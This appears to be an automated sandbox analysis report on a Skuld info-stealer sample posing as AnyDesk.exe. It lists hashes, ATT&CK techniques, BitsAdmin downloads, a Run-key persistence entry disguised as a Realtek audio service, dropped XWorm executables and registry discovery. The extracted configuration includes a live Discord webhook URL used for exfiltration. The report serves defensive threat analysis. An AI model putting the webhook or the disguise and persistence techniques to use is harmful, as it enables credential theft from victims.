skuld | fff4b96876b0c78da96e57cf7ca1b0e0cbee4fde52047a9bde52e25b062d69ca

Analysis

max time kernel
1799s
max time network
1792s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-12-2024 20:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AnyDesk.exe
Size

5.3MB
MD5

0a269c555e15783351e02629502bf141
SHA1

8fefa361e9b5bce4af0090093f51bcd02892b25d
SHA256

fff4b96876b0c78da96e57cf7ca1b0e0cbee4fde52047a9bde52e25b062d69ca
SHA512

b1784109f01d004f2f618e91695fc4ab9e64989cdedc39941cb1a4e7fed9032e096190269f3baefa590cc98552af5824d0f447a03213e4ae07cf55214758725a
SSDEEP

98304:Uc9HTcGO0ImBimas54Ub5ixTStxZi/l9K0+zLVasSe4JnzMpm+Gq:UcpYGO0IOqs57bUwxG9CVaskJIYE

Score

10^/10

skuld agilenet discovery dropper persistence stealer upx

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1314414095461777419/8hYVVlssdJOsLuwWhq5QQqRTlg-3pzMhiKB5tYVl8wS1FN6rDNu-iZ34u_-J5bahL4e7

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Download via BitsAdmin 1 TTPs 4 IoCs

dropper

BITS Jobs

T1197

pid	Process
2556	bitsadmin.exe
3488	bitsadmin.exe
2532	bitsadmin.exe
3436	bitsadmin.exe

Obfuscated with Agile.Net obfuscator 4 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/files/0x0007000000024415-3726.dat	agile_net
behavioral2/memory/5612-3729-0x0000028AADC30000-0x0000028AAE868000-memory.dmp	agile_net
behavioral2/memory/5136-3779-0x0000000006530000-0x0000000007168000-memory.dmp	agile_net
behavioral2/memory/4860-4759-0x0000020D2A240000-0x0000020D2AE78000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	start.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	start.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	start.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	start.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
231	ip-api.com

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	AnyDesk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	AnyDesk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	AnyDesk.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	AnyDesk.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000024414-3721.dat	upx
behavioral2/memory/548-3722-0x0000000000310000-0x000000000124C000-memory.dmp	upx
behavioral2/memory/548-3725-0x0000000000310000-0x000000000124C000-memory.dmp	upx
behavioral2/files/0x0007000000024418-3746.dat	upx
behavioral2/memory/6108-3748-0x0000000000310000-0x000000000124C000-memory.dmp	upx
behavioral2/files/0x000700000002441b-3750.dat	upx
behavioral2/memory/5600-3752-0x0000000000310000-0x000000000124C000-memory.dmp	upx
behavioral2/memory/4976-4745-0x0000000000310000-0x000000000124C000-memory.dmp	upx

Executes dropped EXE 16 IoCs

pid	Process
548	start.exe
5612	XWorm V5.2.exe
6108	start.exe
5600	start.exe
5136	XWormLoader 5.2 x32.exe
6044	XWorm V5.2.exe
532	XWormLoader 5.2 x32.exe
4536	XWorm V5.2.exe
1084	XWormLoader 5.2 x32.exe
5224	XWorm V5.2.exe
4976	start.exe
4860	XWormLoader 5.2 x64.exe
4932	XWormLoader 5.2 x32.exe
4836	XWorm V5.2.exe
4552	XWorm V5.2.exe
1140	XWormLoader 5.2 x64.exe

Loads dropped DLL 64 IoCs

pid	Process
1576	AnyDesk.exe
3856	AnyDesk.exe
5612	XWorm V5.2.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
5136	XWormLoader 5.2 x32.exe
6044	XWorm V5.2.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
532	XWormLoader 5.2 x32.exe
4536	XWorm V5.2.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
1084	XWormLoader 5.2 x32.exe
5224	XWorm V5.2.exe
4860	XWormLoader 5.2 x64.exe
4932	XWormLoader 5.2 x32.exe
4932	XWormLoader 5.2 x32.exe
4932	XWormLoader 5.2 x32.exe
4932	XWormLoader 5.2 x32.exe
4932	XWormLoader 5.2 x32.exe
4932	XWormLoader 5.2 x32.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 63 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWormLoader 5.2 x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWormLoader 5.2 x64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWormLoader 5.2 x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWormLoader 5.2 x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWormLoader 5.2 x64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWormLoader 5.2 x32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWorm V5.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWormLoader 5.2 x32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	XWormLoader 5.2 x64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	XWormLoader 5.2 x32.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000000000001000000ffffffff	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	XWormLoader 5.2 x64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "7"	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = ffffffff	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	XWormLoader 5.2 x64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	XWormLoader 5.2 x64.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	XWormLoader 5.2 x64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	XWormLoader 5.2 x64.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	XWormLoader 5.2 x64.exe
